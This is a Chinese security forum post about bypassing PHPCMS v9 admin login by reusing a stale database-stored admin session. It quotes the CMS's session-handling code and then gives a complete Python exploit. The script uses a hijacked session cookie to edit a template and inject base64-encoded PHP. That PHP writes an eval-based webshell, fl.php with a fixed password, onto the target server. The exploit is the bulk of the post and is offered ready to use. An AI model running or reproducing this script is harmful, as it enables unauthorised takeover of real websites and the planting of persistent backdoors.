查看: 10401|回复: 0

phpcmsv9后台登录绕过

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2013-8-28 10:03:34 | 显示全部楼层 |阅读模式
    (在注入出的hash无法破解的情况下)
    phpcmsv9在数据库中存储着session
    QQ20130720120423.jpg

    1. <?php
    2. return array(
    3. //网站路径
    4. 'web_path' => '/phpcms/install_package/',
    5. //Session配置
    6. 'session_storage' => 'mysql',
    7. 'session_ttl' => 1800,
    8. 'session_savepath' => CACHE_PATH.'sessions/',
    9. 'session_n' => 0,
    10. //Cookie配置
    11. 'cookie_domain' => '', //Cookie 作用域
    12. 'cookie_path' => '', //Cookie 作用路径
    13. 'cookie_pre' => 'MydlE_', //Cookie 前缀,同一域名下安装多套系统时,请修改Cookie前缀
    14. 'cookie_ttl' => 0, //Cookie 生命周期,0 表示随浏览器进程
    15. //模板相关配置
    16. 'tpl_root' => 'templates/', //模板保存物理路径
    17. 'tpl_name' => 'default', //当前模板方案目录
    18. 'tpl_css' => 'default', //当前样式目录
    19. 'tpl_referesh' => 1,
    20. 'tpl_edit'=>1,//是否允许在线编辑模板
    复制代码
    默认是mysql方式存储,session的有效期默认为30分钟。
    /phpcms/libs/classes/session_mysql.class.php
    查看源代码打印帮助

    1.     public function __construct() {
    2.                 $this->db = pc_base::load_model('session_model');
    3.                 $this->lifetime = pc_base::load_config('system','session_ttl');
    4.             session_set_save_handler(array(&$this,'open'), array(&$this,'close'), array(&$this,'read'), array(&$this,'write'), array(&$this,'destroy'), array(&$this,'gc'));
    5.             session_start();
    6.     }
    7. …….
    8.     public function destroy($id) {
    9.                 return $this->db->delete(array('sessionid'=>$id));
    10.     }
    11. /**
    12. * 删除过期的 session
    13. *
    14. * @param $maxlifetime 存活期时间
    15. * @return bool
    16. */
    17.    public function gc($maxlifetime) {
    18.                 $expiretime = SYS_TIME - $maxlifetime;
    19.                 return $this->db->delete("`lastvisit`<$expiretime");
    20.     }
    21. }
    复制代码
    这里只要触发了gc session就会被更新,如果超时了就删除。
    来看看哪里会触发gc
    /phpcms/modules/member/index.php

    1. private function _session_start() {
    2.         $session_storage = 'session_'.pc_base::load_config('system','session_storage');
    3.         pc_base::load_sys_class($session_storage);
    4. }
    复制代码
    前台注册 登录 后台登录都会触发gc操作。所以如果管理没有注销的情况,没人访问触发这些操作的情况下,就算过了半小时,session也不会消失,任然能拿shell。如果session无效,可以通过脚本20分钟监测一次,看是否有效,然后getshell。
    Python写的getshell的脚本

    1. #! /usr/bin/env python
    2. import urllib2,re
    3. #code by 花开、若相惜
    4. #PaxMac Team
    5. url=raw_input('input your attack url: ')
    6. CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here
    7. response = urllib2.Request(url+'/index.php?m=admin')
    8. response.add_header('Cookie',CmsCookie)
    9. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    10. attck = urllib2.urlopen(response)
    11. #print attck.read()
    12. pattern = re.compile('pc_hash=\w{6}', re.I)  
    13. match = pattern.search(attck.read())
    14. if match:
    15.     hashkey=match.group()
    16.     print "I Got pc_hash :"+hashkey
    17. attck.close()
    18. print "Start getshell..."
    19. data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\
    20. %27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\
    21. col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\
    22. class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\
    23. method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\
    24. value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\
    25. class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\
    26. +%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\
    27. select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\
    28. type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\
    29. dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\
    30. class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\
    31. %3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\
    32. %3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\
    33. ++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\
    34. %3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\
    35. %2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\
    36. width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\
    37. if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\
    38. ++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\
    39. class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\
    40. div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey
    41. response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)
    42. response.add_header('Cookie',CmsCookie)
    43. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    44. attck = urllib2.urlopen(response)
    45. #print attck.read()
    46. attck.close()
    47. response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)
    48. response.add_header('Cookie',CmsCookie)
    49. response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    50. attck = urllib2.urlopen(response)
    51. attck.close()
    52. try:
    53.     response = urllib2.Request(url+'/fl.php')
    54.     response.add_header('Cookie',CmsCookie)
    55.     response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
    56.     attck = urllib2.urlopen(response)
    57.     if str(attck.read())=="1":
    58.         print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"
    59.     else:
    60.         print "Failed!"
    61.     attck.close()
    62. except urllib2.HTTPError, e:
    63. print e.code
    复制代码
    作者:花开、若相惜
    博主提醒:此Exp需要更改cookies,注册会员时需自行抓包
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-28 13:10 , Processed in 0.023234 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部